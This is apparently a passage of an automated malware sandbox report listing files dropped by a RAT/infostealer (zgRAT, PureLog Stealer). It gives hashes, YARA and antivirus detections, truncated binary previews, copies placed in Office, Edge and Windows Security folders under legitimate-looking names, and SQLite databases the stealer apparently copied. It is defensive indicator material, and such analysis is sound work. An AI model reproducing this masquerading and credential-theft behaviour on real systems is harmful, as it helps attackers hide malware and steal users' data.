                                                                                                                      SHA-256:4E5619470E12D0F050C33E88F7075267812240FCF2F38E8732486EEA3967AC40
                                                                                                                      SHA-512:42FA950A07F5EDD1C48F6523395ED1816EE1B31EB9D8B905E3C92C31DEC692465862BFF4A840C845D879B1447593FFEFF5924FD0AB4206061DF257C2DC980AE8
                                                                                                                      Malicious:false
                                                                                                                      Preview:%kVPslLEx%%dsDm%..%mGYP%"C:\ChainagentComponent/ChainFontruntimeCrt.exe"%jwk%

                                                                                                                      C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      C:\Program Files (x86)\Microsoft Office\e6c9b481da804f

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (449), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):449
                                                                                                                      Entropy (8bit):5.8435410682421045
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:3ZDCUnAJIMiZlsrvf1m79JYM9/ItfU5gv9mRvMPBYOIWpbBImkjuQWm2osFo69cT:HsIJTuv94fBIW5rk6nWp2m+WF5jiz
                                                                                                                      MD5:21BF69D6B8B053F2000B9665254BF27A
                                                                                                                      SHA1:9E58933FDC6AEF959A8EAFE7AF6DDADCF0F00335
                                                                                                                      SHA-256:66847EEBB842EB29B352F8F058E67DE2B99EA36083EA6BB27E7BA7F6A9DF1D60
                                                                                                                      SHA-512:51EB0AA7D33B15B94DE8F278BA35416B30C4277902DB00C432F339CE56A1BD98EF3055D60137C8690E32FAEB5FFAD0B08657307C96FE58BB3E5533F4D927F4ED
                                                                                                                      Malicious:false
                                                                                                                      Preview:qAvgUFJjQWVjKo4zE0axwMftsDGywEWQD3JcqTvIr6RnhiRotSBelhpdfCxR9UxL9FfQecJvFSGz51LKvcEdD1ogOq6nfdJWIGocCAKRJQYSazio1nfhQUHHa9CxffPlJuqzNsHvRxTxdVFYHSw28lFy8gBD7WvoAwJqItaIfuPcAUoE4oqNsXnho20qrEx5CpwqMZQX1oWNWnyo16JTqi5nIlCQ2ubb7UaUh82eYSVEAaKBEMzu4dOdtJhkXAfHM4QCNdG3Eo5XN1msaBLq5rgdF6lYaRHXxN1GKIykG5pQi0Q2gzJWyyMfXx7Q2scwghk99fiSNlk9BQ4Ops1lHvj8BWtWLhrXc2uAQR3BR1JMONdH2tkK11ou7m8mwLHp3MgJg37YzzUQmXty3mec7hfkN9DoTQOFudSBqUk8vLUBhYHk2JtKrosWq55g0TFil

                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\db08104604e511

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):425
                                                                                                                      Entropy (8bit):5.839719122552602
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:T5EE6CjKEb1ejlXJqN9rKy/PcRRQxdjTpQ4:NP6KKEiXJqvrjSYjTpQ4
                                                                                                                      MD5:5A5423B9CED9CC5CF0D3F0548F2BD48A
                                                                                                                      SHA1:F6A6DDB6F4E67B5DFE23CDAF99334A7F5670388F
                                                                                                                      SHA-256:EA4C57CB33E7CB5885686B7D072F6275867211090373AAA51A3BC8B463BB40B8
                                                                                                                      SHA-512:E96CAC449F61E746A93183CCD03626B4663E3800B694844786749D2E0611A10B847E79FD894A1AD6AAF680FBC23CCE44802503254D8A16CF9E021DEAC6965303
                                                                                                                      Malicious:false
                                                                                                                      Preview:oPyGNa7dP1HxpGLOcHXumCc9Unv388Lxr1pZEMcLF5ZPfcQQmCoO8AxmxzwjoEeQqUFxbwKQoMornMd1WfQ6U6zrDDmOZ3hBaIjLXdy01YkvWG9kW5MIxi6ueYtXK61vonQenSe3qaF5VDU7EB2eqYN1Lyq9ubp4hyGt0e6DaScXdAYbDwTIEWFQZYSylfJPuKYh6lHjEyDX50YKaO57HhzKt0UbLIc4JMnSm1fbptEQTrUjAHYXjLHNUOxFRpY6WIOtMGiiteSYcj1CfvbDtFV7Fa7YDZK9VH4KclW3jznF2tuvWvkgOUNRxQnwIKfTTTDVpqj3Yhe3bPFWpMBSznuB4mWM7juZUUviqZFqMqHqzTzhLRG6INeqiCaCTW6zwFiGegpQGVFIfDLkxyBpcyQHzFAo8CWzuS4uusDol

                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      C:\Program Files\Windows Security\BrowserCore\en-US\db08104604e511

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (504), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):504
                                                                                                                      Entropy (8bit):5.88469223972919
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:pfhFWAY0FxE4nm+NamxtEjTmSx9HnHj3YXhtN:pJFDTrN5yjTHHDIXx
                                                                                                                      MD5:51BAFFB7E667FF4E0CC88BCA55A04BE6
                                                                                                                      SHA1:D3F5B9BA37C4D44AD8EF2E5F41394C75FAC5B06A
                                                                                                                      SHA-256:F4B7FD74AFE97E5E392045B51C5F03BC166F083B628391861802AEF8F26CE65A
                                                                                                                      SHA-512:FFB327F3114E2F3E39C27DD87C2212AF61025B1DFF80AB200492A674D2472E9CCBE1B4C1D9EC1E242E1CC4BC4091094ED409D8F7E07B46B12FBC96490F105048
                                                                                                                      Malicious:false
                                                                                                                      Preview:VQW8ybRYgBSD8QXNJa0EuWDm8dAd4exIx1ee556TbpIkhwy086Va9Lu8MuAUaxeBOKQHv3SNdgmFOdFLoJf7JWIlHgRL5l3oKGVXfrEEoH6djotspyqQRg11Bo9PlHS1n74HIrp6EaTBZpCdwjfG5mWoOdW1sydhyFzltmk7ItL1N0cVlgdClM6AkQ2oVyOP7vNUzbuK9i7LafbYBAPMVb6mIzAct5lUf63bnHfKwTDCOvkFydnVjC4gzkMAbRaD6npelAv4eEaBY3XXO5oPSQudBXlC4fte39FlFFdyss0fm2H6MzvgnLuq3McOYs99V5IYxwRIbzhjZP1IPpzFtN1sPZs3nPZ9t0JqutIahmExnKQnUU8s33QHDaJYDYfMZh0iFKYghYiGJEEEIEiSRqGzkCnTjuWIG1XFTsiK5bLeUJ89WFQ90M5sbB8DhE6wBa9Rq8uagYXzeleaDo7eeXR36onStfm0eZc4KrSXU0dczFN0gh93HbSo

                                                                                                                      C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainFontruntimeCrt.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1179
                                                                                                                      Entropy (8bit):5.354252320228764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                                                                                      MD5:074445AD437DEED8A22F11A846280CE2
                                                                                                                      SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                                                                                      SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                                                                                      SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                                                                                      Malicious:false
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                      C:\Users\user\AppData\Local\Temp\0DEQtPm89c

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\0RYwgN508w

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\0d2UJqcKuk

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\1BYG0dzjOb

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\1I5Wrg3tLj

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\1ioTgflDrA

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\1nH7O17y4f

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\25ZABWrt70

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
